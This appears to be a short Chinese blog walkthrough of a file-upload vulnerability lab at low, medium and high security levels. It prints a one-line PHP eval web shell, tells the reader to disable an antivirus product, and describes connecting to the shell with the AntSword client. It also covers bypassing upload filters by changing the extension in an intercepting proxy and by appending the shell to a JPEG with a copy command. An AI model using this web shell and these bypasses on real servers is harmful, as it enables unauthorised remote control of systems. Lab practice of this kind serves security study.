low
如果没有此文件先关闭火绒,然后找到对应文件夹重新下载一份
上传文件可使用一句话木马
<?php @eval($_POST[value]); ?>
将其写入php文件上传,配合“中国蚁剑”就可以拿下系统
中国蚁剑右击,添加数据
将url与连接密码输入进去,点击测试连接,成功点击添加,就得到系统控制权了
medium
将文件后缀改为jpg,然后开启代理,抓包抓下来,然后改为php再forward,成功上传,再配合蚁剑
high
只能用限定的后置以及文件头,所以简单的改后缀已经不能用了,但是可以把木马写到图片的16进制里
copy 1.jpg /b + 1.php /a 2.jpg
然后上传成功,再配合蚁剑
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
